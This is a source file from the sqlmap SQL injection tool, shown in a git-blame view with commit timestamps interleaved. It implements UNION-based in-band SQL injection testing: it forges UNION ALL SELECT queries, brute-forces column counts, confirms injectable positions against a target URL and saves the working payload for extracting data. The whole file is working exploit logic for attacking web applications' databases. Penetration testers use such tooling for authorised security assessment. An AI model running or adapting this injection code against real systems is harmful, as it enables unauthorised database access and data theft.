sqlmap/lib/techniques/inband/union/test.py

173 lines
5.8 KiB
Python
Raw Normal View History

2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
2008-10-15 19:56:32 +04:00
$Id$
2008-10-15 19:38:22 +04:00
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
2008-10-15 19:38:22 +04:00
"""
from lib.core.agent import agent
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
from lib.core.common import randomStr
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
2010-12-08 16:09:27 +03:00
from lib.core.enums import PAYLOAD
2008-10-15 19:38:22 +04:00
from lib.core.session import setUnion
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
2008-10-15 19:38:22 +04:00
from lib.request.connect import Connect as Request
2010-12-05 19:16:15 +03:00
def __unionPosition(negative=False, count=None, comment=None):
validPayload = None
if count is None:
count = kb.unionCount
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability
for exprPosition in range(0, count):
# Prepare expression with delimiters
randQuery = randomStr()
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment)
2010-12-05 19:16:15 +03:00
payload = agent.payload(newValue=query, negative=negative)
# Perform the request
resultPage, _ = Request.queryPage(payload, content=True)
2010-11-14 18:39:57 +03:00
if resultPage and randQuery in resultPage:
setUnion(position=exprPosition)
validPayload = payload
if not negative:
# Prepare expression with delimiters
randQuery2 = randomStr()
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment, multipleUnions=randQueryUnescaped2)
payload = agent.payload(newValue=query, negative=negative)
# Perform the request
resultPage, _ = Request.queryPage(payload, content=True)
if resultPage and (randQuery not in resultPage or randQuery2 not in resultPage):
setUnion(negative=True)
break
return validPayload
def __unionConfirm(count=None, comment=None):
validPayload = None
# Confirm the inband SQL injection and get the exact column
# position which can be used to extract data
if not isinstance(kb.unionPosition, int):
debugMsg = "testing full inband with %s columns" % count
logger.debug(debugMsg)
validPayload = __unionPosition(count=count, comment=comment)
# Assure that the above function found the exploitable full inband
# SQL injection position
if not isinstance(kb.unionPosition, int):
debugMsg = "testing single-entry inband value with %s columns" % count
logger.debug(debugMsg)
validPayload = __unionPosition(negative=True, count=count, comment=comment)
# Assure that the above function found the exploitable partial
2010-10-26 03:39:55 +04:00
# (single entry) inband SQL injection position with negative
# parameter validPayload
if not isinstance(kb.unionPosition, int):
return None
else:
2010-10-26 03:39:55 +04:00
setUnion(negative=True)
return validPayload
def __unionTestByCharBruteforce(comment):
2008-10-15 19:38:22 +04:00
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
"""
query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)
2008-10-15 19:38:22 +04:00
for count in range(conf.uColsStart, conf.uColsStop+1):
2010-11-02 14:59:24 +03:00
if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
2008-10-15 19:38:22 +04:00
query = query[:-len(" FROM DUAL")]
if count:
query += ", %s" % conf.uChar
2008-10-15 19:38:22 +04:00
2010-11-02 14:59:24 +03:00
if kb.dbms == DBMS.ORACLE:
2008-10-15 19:38:22 +04:00
query += " FROM DUAL"
validPayload = __unionConfirm(count, comment)
if validPayload:
setUnion(count=count)
break
2008-10-15 19:38:22 +04:00
return validPayload
2008-10-15 19:38:22 +04:00
def unionTest():
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 3*50 times
"""
if conf.direct:
return
if kb.unionTest is not None:
return kb.unionTest
2010-12-03 17:57:30 +03:00
oldTechnique = kb.technique
2010-12-08 16:09:27 +03:00
kb.technique = PAYLOAD.TECHNIQUE.UNION
2010-12-03 17:57:30 +03:00
if conf.uChar == "NULL":
technique = "NULL bruteforcing"
else:
technique = "char (%s) bruteforcing" % conf.uChar
infoMsg = "testing inband sql injection on parameter "
infoMsg += "'%s' with %s technique" % (kb.injection.parameter, technique)
logger.info(infoMsg)
2008-10-15 19:38:22 +04:00
comment = queries[kb.dbms].comment.query
validPayload = __unionTestByCharBruteforce(comment)
2008-10-15 19:38:22 +04:00
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload, False)
setUnion(char=conf.uChar)
setUnion(comment=comment)
setUnion(payload=validPayload)
2008-10-15 19:38:22 +04:00
if kb.unionTest is not None:
infoMsg = "the target url is affected by an exploitable "
infoMsg += "inband sql injection vulnerability "
infoMsg += "on parameter '%s' with %d columns" % (kb.injection.parameter, kb.unionCount)
logger.info(infoMsg)
2008-10-15 19:38:22 +04:00
else:
infoMsg = "the target url is not affected by an exploitable "
infoMsg += "inband sql injection vulnerability "
infoMsg += "on parameter '%s'" % kb.injection.parameter
logger.info(infoMsg)
2010-12-03 17:57:30 +03:00
kb.technique = oldTechnique
2008-10-15 19:38:22 +04:00
return kb.unionTest